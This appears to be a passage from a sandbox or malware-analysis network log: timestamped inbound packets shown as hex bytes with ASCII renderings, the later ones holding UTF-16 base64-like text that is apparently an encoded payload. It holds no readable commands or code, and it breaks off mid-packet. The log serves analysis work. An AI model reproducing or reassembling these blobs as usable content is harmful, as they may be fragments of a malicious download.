2022-01-09 17:48:12 UTC	192	IN	Data Raw: ad 84 a6 68 ab b0 8a 18 1a 81 26 51 29 55 ad b3 69 65 35 ea 85 d2 a6 60 d8 b3 64 2e b0 f8 b3 69 81 f1 f4 d0 6d 8d 4f dd 5c fc 3b 8d 0a 6a f7 d2 a4 29 f5 f2 85 2e 41 48 6d 01 d4 2a 34 a0 b8 83 06 ea d5 ca 18 ee ac 0d 77 11 15 f5 15 33 d6 ce da 07 45 8c 3e f3 97 dc 7d be d2 7e da 35 dd cc 3a bd 24 c5 f2 a0 74 56 f2 c6 f6 fc 27 97 f5 a6 ea b0 05 4b 46 d2 a1 d8 b6 02 e3 9e 87 76 44 6e 4e 3f 5b a7 1a 49 4a b2 f0 47 a1 07 52 36 54 c8 91 78 89 0c c0 ce c7 21 4d 03 9a 82 c4 98 4c cf 52 c0 bc ae c8 7f 92 43 30 95 b0 13 65 68 9e d4 83 7e 04 9e 2d 33 f9 c3 3c ee 20 a9 cb 01 20 8d ce 96 b8 18 d8 e6 45 ba 39 97 41 ca 5a e3 dd 87 9d c8 d7 33 19 03 a4 a8 9f 81 7c 18 ed 48 64 a2 bc c4 85 a5 e0 20 96 09 46 ad b4 6c 22 03 04 9b 15 b2 3e dd c1 3f 7f 2e 6b 5e 86 0b 88 ab ab Data Ascii: h&Q)Uie5`d.imO\;j).AHm*4w3E>}~5:$tV'KFvDnN?[IJGR6Tx!MLRC0eh~-3< E9AZ3\|Hd Fl">?.k^
2022-01-09 17:48:12 UTC	196	IN	Data Raw: 1b 19 0a f3 c2 10 d3 0c c6 33 5f c7 e7 67 ce 50 e4 3c 11 20 db 19 b8 d1 1e b3 31 ac 75 31 9a 07 47 2b 65 22 f4 79 f9 9c a4 b7 f8 82 25 b7 db 7a 75 eb 15 a8 2e 0c a1 78 b1 f0 d5 66 c2 53 54 7b 3c 14 12 7b a6 c8 68 80 4e ff e2 b2 4d 5b 4d 36 01 68 53 e1 71 96 15 cd e8 d6 9a c9 ce e0 24 a8 df 27 e3 4e 0f 87 d0 15 91 b9 82 62 08 61 cd 8f 39 48 17 bb 13 6a 93 33 e5 dc 41 6a 32 ed f0 16 d2 b9 63 63 b1 c9 66 06 3d fc 39 70 5d 58 48 cc e2 70 79 85 a3 0f 98 9e d8 80 c7 0b 46 fb 4c e5 d3 75 85 4e 03 9a 40 dd ae d6 34 0b b3 58 cb cf 91 b4 6c f1 c0 bc df 2d e9 7a b0 5b 7d dd 25 e9 bb f6 a0 40 b1 20 f6 5a 81 fc 18 11 95 a9 bc 35 13 d3 03 4a 8d 0c 2d a5 b9 cc 50 c7 6a c6 f5 cd 3e ee 7c 1d 2b c0 81 6e 6b 15 08 52 84 2d 33 e1 f4 87 04 81 a6 06 dc 43 e1 8b ed e9 10 ce d6 Data Ascii: 3_gP< 1u1G+e"y%zu.xfST{<{hNM[M6hSq$'Nba9Hj3Aj2ccf=9p]XHpyFLuN@4Xl-z[}%@ Z5J-Pj>\|+nkR-3C
2022-01-09 17:48:12 UTC	200	IN	Data Raw: d3 cc f3 fb 32 78 c9 76 5e b8 0a ad fa 83 31 75 3b 28 3a a4 bd c2 a3 85 16 21 15 10 9d ad 62 a0 1c 32 c6 76 7a 3d db 99 ba 89 c2 93 46 c2 72 e8 44 af 57 0f 51 6d 47 9a f5 ad 06 ef 3c 79 28 46 91 1c a0 0f 75 6f 4a de 75 dc 42 5f 3d e0 f6 00 d6 2d 6f f4 0d a6 00 4c fd 92 24 1a 5e 67 40 0a 18 6a 57 37 c7 fc 8b da 90 9f 28 be 92 34 0b ad f2 5d 83 d7 97 29 dc 75 c5 14 61 3d 74 56 58 db a1 c6 b8 63 19 ea 51 02 9a e2 41 db c8 d4 44 0d d0 66 69 14 3a 6a 26 6d 92 b6 ff 52 9c d5 59 b7 5e 19 27 48 0e ce a3 18 96 00 8a 69 8e 63 6b b7 69 c0 d1 4a b2 40 83 d3 c0 8e d5 b4 7c 99 90 c3 62 19 2b b0 8d fb e9 9c a8 e4 6b 1b 1c 9d bf 35 9e 57 5f cc 3c 38 ee f7 db e6 0a 6a 9a aa 07 21 74 f0 50 ef 8e 55 e8 d3 45 73 2f 7c 8f 49 d1 87 88 96 cc 26 8a e5 3e fb 29 75 f0 01 da 96 82 Data Ascii: 2xv^1u;(:!b2vz=FrDWQmG<y(FuoJuB_=-oL$^g@jW7(4])ua=tVXcQADfi:j&mRY^'HickiJ@\|b+k5W_<8j!tPUEs/\|I&>)u
2022-01-09 17:48:12 UTC	204	IN	Data Raw: 33 5a 08 71 c5 4a 8a 99 ea 8c 5d f6 3a 27 ea 28 dd 85 90 cf 4c c9 36 46 33 76 e0 66 df 1d 43 50 45 50 d9 a5 86 5b 33 09 61 4e 6b 36 08 cc 58 9e b1 5d 0b b6 da 79 d9 36 bd ca ce ab 15 4f ac 41 ae 2b 29 0d 86 86 9c 16 40 37 e5 41 b7 93 4d fd ed 69 65 3a f7 80 89 8a 46 13 66 b4 16 37 18 3f fa 7e f2 e8 19 82 b0 6b b8 06 50 44 51 6a 74 6c dd 79 da d1 dc f1 c6 e3 d6 13 d9 b3 21 22 02 94 4e 93 7d f5 6f 44 4f fe df ea eb 5b a8 79 b1 bc 5e de 8d 2b 1a 7c f8 da 0a 89 82 bb 38 95 92 5d 4a 9f d0 69 ec 2a db ad 83 1f d8 84 4d d0 d1 a4 cb 2d ce 72 66 2a 48 56 87 6e 66 2f 18 e4 36 3e e6 b3 92 7f 2a 35 4b f6 27 35 7b 95 6c 5c 8e 15 8f c9 11 1a 85 f3 82 bc a9 64 d0 b6 71 a4 13 4e 3f e6 44 7b 81 df 73 ae 67 c5 00 d4 35 88 7b 09 0c aa be 36 83 7f 59 cb de ff bb d9 d7 f4 c8 Data Ascii: 3ZqJ]:'(L6F3vfCPEP[3aNk6X]y6OA+)@7AMie:Ff7?~kPDQjtly!"N}oDO[y^+\|8]JiM-rfHVnf/6>*5K'5{l\dqN?D{sg5{6Y
2022-01-09 17:48:12 UTC	209	IN	Data Raw: 25 8f c5 a6 11 d5 01 2e 87 08 5a 4d 18 6b 12 1b 97 8c e8 2c 84 de 16 35 43 1a 6d 52 c7 45 2a db 13 6b 32 ea 53 3a 97 a5 6e 05 28 c0 43 58 88 3f 2c ff 60 5f 3d ff 63 f1 9b 5f 25 b2 57 15 58 b4 9a 61 57 f9 30 d6 19 21 38 89 78 f6 79 27 ed f9 6a 5e 49 5c da 92 e8 6f e6 0f 76 23 05 eb 7c 8f 11 73 d2 88 50 2d 59 cc 0d be c6 0c 90 ef ca 59 5e b0 d4 c1 98 83 f1 fc 9b 24 68 a1 e5 bc 09 25 af 1e 34 dd 1f 46 6b 0d db 1d 5f 3d a3 ba af 2a 6a aa 08 ee 12 62 dd 89 72 4b 4a 6b b4 f2 b5 3d da 8c dd 4f f2 e6 46 61 b4 98 8a c3 bd 8a 63 91 9b 75 a9 07 d2 c3 7a d9 75 7d 09 d6 67 30 89 c8 d8 ac 87 45 a6 d4 8c cc 16 07 b9 77 c2 b4 a1 c8 c0 61 83 86 5e 7a 26 97 2a f2 c6 bc ae 2e e6 0a ec d0 00 09 6c 77 a5 84 b1 cc d3 37 b9 9f c5 e9 55 0f c5 47 ff 08 d8 15 ea 84 82 45 0b e4 49 Data Ascii: %.ZMk,5CmREk2S:n(CX?,`_=c_%WXaW0!8xy'j^I\ov#\|sP-YY^$h%4Fk_=jbrKJk=OFacuzu}g0Ewa^z&*.lw7UGEI
2022-01-09 17:48:12 UTC	213	IN	Data Raw: 23 49 81 91 ae c7 7a 6b b8 49 99 cb 93 c3 6d 78 0c 7b 23 4c df 18 66 43 23 52 c8 fd 51 42 1a 18 18 99 18 6d fd c7 aa d5 a1 be c7 1d 84 1c 60 02 9e bd 62 09 37 ad 2d 3d 70 75 1b cc 3a e7 48 76 e9 f8 1e 7c 38 07 5d 0f d0 5a 2f e0 9d d3 2d 31 69 65 41 2a a8 15 5b 12 35 a2 24 0c 94 b9 64 c4 3d 40 15 da 94 06 0c d8 a7 a2 d5 d4 01 0f 81 b9 32 ca 38 95 ff 57 01 59 d7 61 3c 88 f4 46 d3 9f 74 5d 20 cd 9f f6 79 4c 4b df 3e b4 1c f1 37 34 98 a0 b1 83 8d b3 6e 3a e9 dc 52 72 44 fb b4 f3 ae 73 4c 78 06 a8 b6 f9 bf 0b 5c 0d 09 50 44 a2 db 26 b0 c8 05 10 1a 34 e5 2a 53 84 ee c2 fe 02 54 62 70 fe c1 1c 0d f5 30 b8 63 fc f2 1c 65 6b 41 84 bb f8 ac 4b 57 2e 7f 95 26 c1 b6 68 8c 66 cb 8a ed d6 12 af ec f8 8d 6c 41 c4 eb 13 d6 23 84 96 09 e2 81 3e a7 02 78 95 53 84 76 a3 39 Data Ascii: #IzkImx{#LfC#RQBm`b7-=pu:Hv\|8]Z/-1ieA[5$d=@28WYa<Ft] yLK>74n:RrDsLx\PD&4STbp0cekAKW.&hflA#>xSv9
2022-01-09 17:48:12 UTC	224	IN	Data Raw: 30 0d 80 88 90 00 17 3b 06 4f ba 9e 18 84 f2 76 ee 2d cd cf b1 a9 a2 98 6d a1 94 f6 f1 24 c2 c7 68 e0 42 b4 ee f9 99 23 81 97 5e 55 6e 2a 77 73 c6 f9 2c 61 7d 60 8a 62 93 80 b9 81 f6 f6 ec d4 43 7c ce 32 c9 0f 05 13 90 7b 22 00 c1 83 19 de ba c9 93 86 38 97 07 ce 0f c9 04 67 f1 8a 1b 70 2b 41 cb 21 06 6c 23 46 ae 3c 02 7f 47 5a 16 81 8d 7c df 46 a1 4e 80 6a 55 81 7f 75 08 69 d9 1b 75 30 10 7a 19 c4 04 e6 c6 1e 54 03 53 17 30 89 6c 6d c1 3d fb 89 07 df da d6 09 6a 2b 3a c4 e6 84 08 3c 68 d7 74 dc 76 62 18 67 f4 65 22 4c 8b 67 61 6d 1b 22 51 38 15 05 18 88 4b cd 46 33 45 85 12 a5 a9 7a 04 48 b0 5a 53 59 06 5b a5 5b 86 dc 64 8c ac ff ff c8 eb 3a 76 4f 20 c1 7b 83 0d 59 7b c4 58 c3 6a 00 93 62 42 01 b5 d8 6e 85 73 e4 0e cd 29 39 bb da f4 b3 e4 e6 4e f0 01 3d Data Ascii: 0;Ov-m$hB#^Un*ws,a}`bC\|2{"8gp+A!l#F<GZ\|FNjUuiu0zTS0lm=j+:<htvbge"Lgam"Q8KF3EzHZSY[[d:vO {Y{XjbBns)9N=
2022-01-09 17:48:12 UTC	229	IN	Data Raw: 4d d8 73 62 74 1d 9b eb e6 7e 4e 43 82 25 1d bb ac a1 fd e3 46 6d f5 c7 db 93 1b 68 e2 d5 05 09 8d ef e8 81 59 53 7f 08 6f 28 be d0 be 8a cb 9d bc 8e 21 46 f1 21 f8 2c fc d7 47 2e 07 dc 88 79 5a 0c c1 60 ac a1 ef 33 81 a3 a1 ff 3f 91 35 98 b1 53 42 26 fa 2c 54 00 25 b3 db 78 d2 01 75 d7 b4 e5 5b e0 b5 df 35 6b 55 af 08 0f 7c 6d cf 4d 9b 4f f3 51 4c cd 5a dd ab ec ab 22 04 8e d0 ee f6 81 7d 0d c7 03 1e b4 48 6c fd 0a 47 81 c6 cc bd 09 c1 bb a0 e4 42 e6 15 f7 25 9f 78 d7 11 90 5a 3f 46 17 b6 de 32 c6 b6 a7 a0 21 ec c8 2c c4 a9 9b 7c b2 f1 17 8d 89 2d dc b4 80 50 b9 dc e3 e7 43 62 d6 cb 5e 87 4f 3a 4f aa 7a 76 89 11 3d c2 78 fa 48 65 c3 5d cb af 2d 2e e2 c6 dc d6 c6 8d ec 5f f4 1d 04 f1 b4 23 2a 3c 68 08 a9 e8 b9 9f 4f 79 9b 1c 16 3d d6 3b dd 65 f3 ef f9 32 Data Ascii: Msbt~NC%FmhYSo(!F!,G.yZ`3?5SB&,T%xu[5kU\|mMOQLZ"}HlGB%xZ?F2!,\|-PCb^O:Ozv=xHe]-._#*<hOy=;e2
2022-01-09 17:48:12 UTC	245	IN	Data Raw: b1 23 7d c6 57 79 1a 52 0c ee 88 25 cc 05 6a fc ee 86 8c 29 f8 00 46 ac e8 b2 b1 aa 18 1f 32 49 fd 9a 8f f9 e3 64 96 30 90 3f 7f 3d 4a f9 5c 1e cc 03 4b 30 1d 42 12 b1 c2 91 6a bc 0f 34 64 6b da 6b 02 83 09 88 75 1a fe 15 6a a9 0a d9 6a 3a 3f 40 ce ff eb d5 6d a8 16 07 3d 28 76 d3 01 c6 bb ef bb 02 bb f6 f9 05 04 b8 e2 d6 eb 27 e2 0c 00 ee d2 6e c4 b9 8a a5 ba 1f 01 c8 e8 09 4b a4 4b 58 89 89 55 6f 1a 3b 68 0a fb 3c d0 5f dc 87 a1 2d 2a 5e 05 81 92 b2 e7 04 f4 c7 80 ab e3 7c 02 be 3b e0 b0 48 97 ec 19 00 45 4d 85 d4 ff e8 e7 56 9a d8 c0 80 e1 97 e5 de ac b0 50 72 c8 dd cb 70 ea e2 e4 a6 ad 98 01 df 34 c9 0b 5d 9d dd 8c 07 6d 76 a2 79 b6 5b 5c 35 fe d8 e9 b9 c0 55 00 ce 78 bd 97 75 ea 2b 82 ae 59 94 d7 7a e8 43 18 5b b2 d5 51 88 8f be 07 c6 27 ab cf b7 2d Data Ascii: #}WyR%j)F2Id0?=J\K0Bj4dkkujj:?@m=(v'nKKXUo;h<_-*^\|;HEMVPrp4]mvy[\5Uxu+YzC[Q'-
2022-01-09 17:48:12 UTC	256	IN	Data Raw: 00 30 00 6b 00 77 00 45 00 6f 00 46 00 54 00 66 00 69 00 33 00 75 00 71 00 51 00 49 00 6e 00 73 00 6c 00 6f 00 68 00 42 00 4f 00 48 00 6a 00 6b 00 64 00 65 00 78 00 39 00 64 00 41 00 30 00 63 00 4a 00 7a 00 4d 00 42 00 38 00 32 00 37 00 62 00 30 00 4b 00 62 00 4c 00 44 00 62 00 6d 00 61 00 4f 00 67 00 4a 00 63 00 61 00 48 00 59 00 34 00 70 00 41 00 34 00 78 00 41 00 37 00 48 00 6f 00 56 00 53 00 77 00 4b 00 72 00 42 00 57 00 2b 00 64 00 72 00 64 00 6b 00 55 00 70 00 6d 00 55 00 49 00 50 00 56 00 70 00 46 00 70 00 50 00 4e 00 4a 00 30 00 56 00 67 00 37 00 38 00 4a 00 39 00 79 00 51 00 59 00 69 00 50 00 4d 00 45 00 36 00 51 00 39 00 75 00 59 00 49 00 49 00 67 00 48 00 79 00 46 00 76 00 2b 00 46 00 48 00 62 00 77 00 53 00 35 00 4d 00 41 00 58 00 6a 00 41 00 Data Ascii: 0kwEoFTfi3uqQInslohBOHjkdex9dA0cJzMB827b0KbLDbmaOgJcaHY4pA4xA7HoVSwKrBW+drdkUpmUIPVpFpPNJ0Vg78J9yQYiPME6Q9uYIIgHyFv+FHbwS5MAXjA
2022-01-09 17:48:12 UTC	272	IN	Data Raw: 00 4e 00 4b 00 31 00 71 00 67 00 62 00 6d 00 58 00 55 00 57 00 33 00 78 00 30 00 39 00 6f 00 79 00 4d 00 6e 00 32 00 56 00 47 00 38 00 54 00 51 00 79 00 6c 00 75 00 4d 00 50 00 43 00 37 00 46 00 46 00 48 00 70 00 30 00 65 00 7a 00 50 00 49 00 4d 00 30 00 50 00 49 00 62 00 4f 00 71 00 38 00 35 00 59 00 57 00 4d 00 6a 00 38 00 4e 00 46 00 51 00 7a 00 30 00 78 00 30 00 31 00 7a 00 32 00 4b 00 64 00 65 00 76 00 42 00 7a 00 66 00 37 00 6c 00 34 00 50 00 45 00 56 00 67 00 64 00 37 00 62 00 49 00 4d 00 72 00 35 00 72 00 2b 00 78 00 64 00 31 00 72 00 79 00 4b 00 66 00 48 00 6b 00 58 00 43 00 58 00 6b 00 5a 00 41 00 56 00 65 00 4a 00 78 00 55 00 76 00 6e 00 78 00 6e 00 33 00 50 00 55 00 76 00 4a 00 51 00 2f 00 34 00 56 00 52 00 66 00 58 00 69 00 34 00 50 00 38 00 Data Ascii: NK1qgbmXUW3x09oyMn2VG8TQyluMPC7FFHp0ezPIM0PIbOq85YWMj8NFQz0x01z2KdevBzf7l4PEVgd7bIMr5r+xd1ryKfHkXCXkZAVeJxUvnxn3PUvJQ/4VRfXi4P8
2022-01-09 17:48:12 UTC	288	IN	Data Raw: 00 47 00 50 00 72 00 4b 00 4c 00 2b 00 42 00 63 00 35 00 50 00 6b 00 6d 00 5a 00 69 00 6f 00 48 00 59 00 55 00 51 00 6b 00 77 00 4e 00 2f 00 51 00 2f 00 48 00 6a 00 63 00 56 00 39 00 4f 00 69 00 50 00 35 00 67 00 56 00 4b 00 41 00 55 00 68 00 71 00 50 00 73 00 37 00 6b 00 79 00 32 00 42 00 6c 00 73 00 6f 00 4c 00 4a 00 46 00 38 00 4e 00 36 00 69 00 2b 00 4a 00 44 00 74 00 31 00 76 00 79 00 4f 00 45 00 4d 00 49 00 78 00 36 00 6f 00 67 00 38 00 68 00 51 00 6c 00 44 00 2b 00 72 00 48 00 65 00 32 00 52 00 38 00 33 00 6c 00 33 00 39 00 35 00 53 00 31 00 30 00 75 00 6b 00 34 00 62 00 78 00 36 00 55 00 43 00 4b 00 57 00 32 00 35 00 37 00 61 00 50 00 35 00 35 00 32 00 58 00 34 00 35 00 4b 00 52 00 50 00 47 00 70 00 31 00 4b 00 65 00 45 00 50 00 7a 00 49 00 41 00 Data Ascii: GPrKL+Bc5PkmZioHYUQkwN/Q/HjcV9OiP5gVKAUhqPs7ky2BlsoLJF8N6i+JDt1vyOEMIx6og8hQlD+rHe2R83l395S10uk4bx6UCKW257aP552X45KRPGp1KeEPzIA
2022-01-09 17:48:12 UTC	304	IN	Data Raw: 00 51 00 63 00 30 00 67 00 35 00 64 00 6f 00 30 00 4c 00 57 00 71 00 6e 00 4d 00 61 00 4a 00 35 00 52 00 65 00 72 00 33 00 66 00 54 00 4b 00 34 00 37 00 5a 00 4a 00 6e 00 36 00 44 00 45 00 77 00 37 00 78 00 42 00 54 00 64 00 36 00 32 00 71 00 4d 00 38 00 36 00 7a 00 57 00 33 00 35 00 36 00 4a 00 6e 00 68 00 34 00 54 00 6d 00 4e 00 71 00 5a 00 63 00 6e 00 48 00 47 00 67 00 79 00 79 00 4d 00 68 00 58 00 42 00 45 00 50 00 70 00 79 00 48 00 76 00 47 00 70 00 52 00 44 00 30 00 64 00 5a 00 44 00 39 00 52 00 46 00 4f 00 2b 00 6d 00 47 00 73 00 6e 00 61 00 6f 00 4f 00 50 00 48 00 49 00 70 00 41 00 64 00 57 00 73 00 41 00 78 00 78 00 49 00 7a 00 42 00 31 00 79 00 7a 00 6f 00 6f 00 34 00 50 00 6a 00 34 00 6b 00 6c 00 57 00 6a 00 70 00 74 00 33 00 48 00 46 00 58 00 Data Ascii: Qc0g5do0LWqnMaJ5Rer3fTK47ZJn6DEw7xBTd62qM86zW356Jnh4TmNqZcnHGgyyMhXBEPpyHvGpRD0dZD9RFO+mGsnaoOPHIpAdWsAxxIzB1yzoo4Pj4klWjpt3HFX
2022-01-09 17:48:12 UTC	320	IN	Data Raw: 00 73 00 72 00 69 00 4e 00 51 00 46 00 77 00 49 00 7a 00 35 00 52 00 64 00 56 00 54 00 4d 00 73 00 66 00 53 00 4d 00 4e 00 66 00 44 00 6b 00 74 00 51 00 49 00 55 00 6f 00 56 00 6e 00 73 00 6e 00 43 00 78 00 51 00 45 00 42 00 61 00 54 00 41 00 71 00 2f 00 4a 00 46 00 31 00 6d 00 38 00 78 00 66 00 32 00 52 00 4e 00 35 00 48 00 75 00 35 00 65 00 61 00 4e 00 67 00 37 00 50 00 4c 00 44 00 67 00 38 00 6e 00 68 00 52 00 33 00 30 00 71 00 66 00 46 00 63 00 6e 00 5a 00 75 00 41 00 69 00 6a 00 6f 00 55 00 6c 00 6e 00 51 00 65 00 37 00 56 00 49 00 7a 00 44 00 6f 00 52 00 57 00 76 00 38 00 67 00 6c 00 63 00 50 00 5a 00 39 00 58 00 53 00 62 00 54 00 7a 00 74 00 77 00 53 00 42 00 69 00 4d 00 4a 00 77 00 5a 00 54 00 45 00 53 00 6a 00 42 00 44 00 46 00 43 00 76 00 70 00 Data Ascii: sriNQFwIz5RdVTMsfSMNfDktQIUoVnsnCxQEBaTAq/JF1m8xf2RN5Hu5eaNg7PLDg8nhR30qfFcnZuAijoUlnQe7VIzDoRWv8glcPZ9XSbTztwSBiMJwZTESjBDFCvp
2022-01-09 17:48:12 UTC	336	IN	Data Raw: 00 62 00 6e 00 75 00 7a 00 7a 00 68 00 31 00 50 00 45 00 75 00 6c 00 75 00 59 00 66 00 44 00 78 00 66 00 47 00 66 00 72 00 44 00 46 00 46 00 46 00 54 00 48 00 70 00 30 00 66 00 35 00 30 00 2f 00 66 00 54 00 69 00 61 00 38 00 55 00 46 00 59 00 55 00 4b 00 4d 00 4d 00 2f 00 72 00 65 00 71 00 6b 00 77 00 53 00 58 00 56 00 47 00 32 00 73 00 49 00 43 00 57 00 69 00 2f 00 69 00 39 00 78 00 76 00 70 00 2f 00 70 00 51 00 6b 00 66 00 58 00 39 00 2b 00 55 00 6d 00 32 00 42 00 70 00 37 00 69 00 6b 00 47 00 53 00 32 00 45 00 38 00 6a 00 64 00 33 00 4c 00 66 00 43 00 4b 00 78 00 77 00 4c 00 7a 00 5a 00 4a 00 33 00 78 00 35 00 74 00 66 00 6f 00 78 00 7a 00 58 00 6a 00 53 00 35 00 64 00 62 00 64 00 56 00 64 00 68 00 71 00 66 00 55 00 6d 00 61 00 46 00 76 00 34 00 34 00 Data Ascii: bnuzzh1PEuluYfDxfGfrDFFFTHp0f50/fTia8UFYUKMM/reqkwSXVG2sICWi/i9xvp/pQkfX9+Um2Bp7ikGS2E8jd3LfCKxwLzZJ3x5tfoxzXjS5dbdVdhqfUmaFv44
2022-01-09 17:48:12 UTC	352	IN	Data Raw: 00 68 00 6b 00 6f 00 44 00 6f 00 71 00 50 00 4a 00 4b 00 72 00 4e 00 39 00 52 00 4b 00 37 00 6a 00 44 00 33 00 57 00 67 00 6d 00 45 00 68 00 49 00 54 00 50 00 32 00 73 00 64 00 39 00 63 00 31 00 4f 00 74 00 77 00 51 00 71 00 45 00 38 00 48 00 5a 00 56 00 58 00 56 00 55 00 49 00 4e 00 4c 00 6c 00 54 00 6b 00 4f 00 54 00 4f 00 7a 00 30 00 47 00 6d 00 47 00 6f 00 35 00 64 00 4b 00 33 00 52 00 61 00 31 00 4c 00 37 00 63 00 69 00 32 00 2f 00 5a 00 34 00 45 00 31 00 6b 00 66 00 72 00 64 00 75 00 55 00 45 00 68 00 4d 00 58 00 67 00 6b 00 6b 00 64 00 62 00 78 00 6d 00 44 00 61 00 6b 00 62 00 38 00 5a 00 2f 00 34 00 48 00 4f 00 31 00 46 00 6a 00 35 00 4a 00 38 00 49 00 63 00 4a 00 56 00 72 00 4f 00 37 00 68 00 2b 00 6a 00 63 00 67 00 61 00 66 00 43 00 35 00 43 00 Data Ascii: hkoDoqPJKrN9RK7jD3WgmEhITP2sd9c1OtwQqE8HZVXVUINLlTkOTOz0GmGo5dK3Ra1L7ci2/Z4E1kfrduUEhMXgkkdbxmDakb8Z/4HO1Fj5J8IcJVrO7h+jcgafC5C
2022-01-09 17:48:12 UTC	368	IN	Data Raw: 00 72 00 53 00 35 00 5a 00 30 00 48 00 56 00 37 00 72 00 77 00 6a 00 63 00 6d 00 45 00 70 00 78 00 6d 00 50 00 64 00 67 00 75 00 66 00 44 00 38 00 35 00 6a 00 6b 00 45 00 47 00 6a 00 4a 00 65 00 63 00 4d 00 72 00 5a 00 68 00 2b 00 54 00 62 00 38 00 76 00 54 00 72 00 71 00 4a 00 70 00 75 00 55 00 61 00 4f 00 56 00 42 00 43 00 41 00 6e 00 67 00 70 00 52 00 75 00 49 00 79 00 4e 00 72 00 5a 00 44 00 66 00 72 00 37 00 54 00 46 00 46 00 33 00 33 00 35 00 71 00 51 00 71 00 39 00 4d 00 44 00 30 00 56 00 75 00 69 00 36 00 37 00 74 00 54 00 69 00 2b 00 7a 00 35 00 53 00 4f 00 50 00 2f 00 6a 00 45 00 52 00 33 00 65 00 57 00 6d 00 30 00 77 00 4c 00 73 00 75 00 32 00 68 00 42 00 72 00 48 00 49 00 4c 00 4f 00 72 00 58 00 50 00 6c 00 30 00 30 00 49 00 64 00 47 00 47 00 Data Ascii: rS5Z0HV7rwjcmEpxmPdgufD85jkEGjJecMrZh+Tb8vTrqJpuUaOVBCAngpRuIyNrZDfr7TFF335qQq9MD0Vui67tTi+z5SOP/jER3eWm0wLsu2hBrHILOrXPl00IdGG
2022-01-09 17:48:12 UTC	384	IN	Data Raw: 00 49 00 55 00 44 00 6e 00 61 00 59 00 53 00 68 00 34 00 58 00 78 00 74 00 64 00 48 00 36 00 35 00 34 00 61 00 75 00 67 00 4a 00 78 00 46 00 30 00 41 00 70 00 78 00 38 00 44 00 6c 00 66 00 78 00 75 00 45 00 4c 00 66 00 75 00 72 00 70 00 54 00 65 00 61 00 61 00 51 00 48 00 36 00 36 00 68 00 33 00 50 00 35 00 44 00 53 00 4a 00 59 00 55 00 37 00 52 00 45 00 52 00 78 00 6a 00 52 00 4b 00 65 00 67 00 68 00 44 00 2f 00 49 00 33 00 70 00 4f 00 39 00 43 00 48 00 75 00 61 00 77 00 56 00 2b 00 41 00 71 00 41 00 49 00 44 00 6d 00 54 00 31 00 7a 00 7a 00 67 00 4e 00 30 00 7a 00 75 00 79 00 6a 00 77 00 74 00 7a 00 45 00 37 00 56 00 7a 00 69 00 4b 00 6d 00 47 00 44 00 53 00 52 00 6b 00 49 00 33 00 69 00 58 00 4f 00 35 00 37 00 6f 00 6a 00 4c 00 4f 00 75 00 38 00 4c 00 Data Ascii: IUDnaYSh4XxtdH654augJxF0Apx8DlfxuELfurpTeaaQH66h3P5DSJYU7RERxjRKeghD/I3pO9CHuawV+AqAIDmT1zzgN0zuyjwtzE7VziKmGDSRkI3iXO57ojLOu8L
2022-01-09 17:48:12 UTC	400	IN	Data Raw: 00 45 00 44 00 78 00 6b 00 6b 00 34 00 75 00 65 00 47 00 4c 00 73 00 64 00 4e 00 57 00 42 00 63 00 47 00 49 00 7a 00 69 00 4f 00 31 00 4f 00 6c 00 75 00 71 00 61 00 43 00 6d 00 6a 00 56 00 76 00 51 00 62 00 52 00 46 00 69 00 72 00 74 00 6d 00 7a 00 45 00 6b 00 59 00 71 00 57 00 43 00 6f 00 50 00 47 00 36 00 70 00 75 00 53 00 71 00 37 00 62 00 75 00 41 00 6e 00 74 00 6c 00 4c 00 56 00 59 00 48 00 58 00 6c 00 77 00 35 00 57 00 6a 00 6b 00 70 00 75 00 62 00 55 00 61 00 47 00 4c 00 64 00 6c 00 35 00 62 00 68 00 46 00 6c 00 4e 00 2f 00 4c 00 33 00 5a 00 76 00 33 00 43 00 6a 00 69 00 58 00 72 00 6d 00 58 00 5a 00 32 00 36 00 7a 00 63 00 77 00 62 00 59 00 6b 00 72 00 75 00 52 00 39 00 52 00 4f 00 57 00 32 00 62 00 34 00 36 00 71 00 4b 00 6c 00 36 00 73 00 35 00 Data Ascii: EDxkk4ueGLsdNWBcGIziO1OluqaCmjVvQbRFirtmzEkYqWCoPG6puSq7buAntlLVYHXlw5WjkpubUaGLdl5bhFlN/L3Zv3CjiXrmXZ26zcwbYkruR9ROW2b46qKl6s5
2022-01-09 17:48:12 UTC	416	IN	Data Raw: 00 56 00 59 00 4c 00 4e 00 68 00 72 00 64 00 77 00 79 00 65 00 56 00 4d 00 50 00 36 00 73 00 49 00 67 00 45 00 77 00 46 00 47 00 59 00 42 00 58 00 62 00 4e 00 70 00 6b 00 2f 00 34 00 46 00 30 00 50 00 69 00 73 00 77 00 64 00 5a 00 4f 00 64 00 56 00 59 00 46 00 62 00 6e 00 6a 00 6a 00 47 00 66 00 54 00 4d 00 36 00 6e 00 43 00 74 00 54 00 50 00 50 00 49 00 52 00 57 00 4b 00 4c 00 69 00 57 00 77 00 50 00 41 00 39 00 55 00 30 00 43 00 52 00 71 00 37 00 39 00 55 00 4b 00 49 00 6c 00 4e 00 44 00 74 00 61 00 62 00 52 00 5a 00 4f 00 6f 00 79 00 46 00 55 00 54 00 4f 00 63 00 41 00 4e 00 57 00 6a 00 54 00 35 00 67 00 45 00 54 00 4c 00 35 00 57 00 73 00 76 00 39 00 34 00 6e 00 62 00 58 00 74 00 54 00 41 00 5a 00 34 00 68 00 74 00 5a 00 2b 00 4b 00 77 00 6d 00 4f 00 Data Ascii: VYLNhrdwyeVMP6sIgEwFGYBXbNpk/4F0PiswdZOdVYFbnjjGfTM6nCtTPPIRWKLiWwPA9U0CRq79UKIlNDtabRZOoyFUTOcANWjT5gETL5Wsv94nbXtTAZ4htZ+KwmO
2022-01-09 17:48:12 UTC	432	IN	Data Raw: 00 76 00 68 00 57 00 4d 00 73 00 6f 00 64 00 77 00 39 00 47 00 54 00 5a 00 43 00 39 00 33 00 6d 00 34 00 4b 00 38 00 74 00 78 00 63 00 48 00 44 00 2b 00 65 00 6c 00 44 00 67 00 45 00 49 00 38 00 6c 00 35 00 74 00 78 00 51 00 6b 00 4a 00 46 00 6c 00 6c 00 39 00 54 00 77 00 56 00 4d 00 63 00 63 00 36 00 66 00 72 00 42 00 66 00 63 00 59 00 48 00 77 00 53 00 71 00 6b 00 61 00 76 00 44 00 32 00 38 00 68 00 64 00 2f 00 72 00 50 00 69 00 76 00 6f 00 47 00 37 00 75 00 42 00 4f 00 4e 00 44 00 2b 00 62 00 50 00 69 00 35 00 5a 00 64 00 54 00 41 00 48 00 68 00 67 00 4c 00 33 00 4c 00 32 00 51 00 65 00 72 00 6f 00 38 00 6a 00 33 00 53 00 78 00 6f 00 6e 00 56 00 4b 00 45 00 43 00 52 00 6e 00 2f 00 4c 00 61 00 67 00 43 00 39 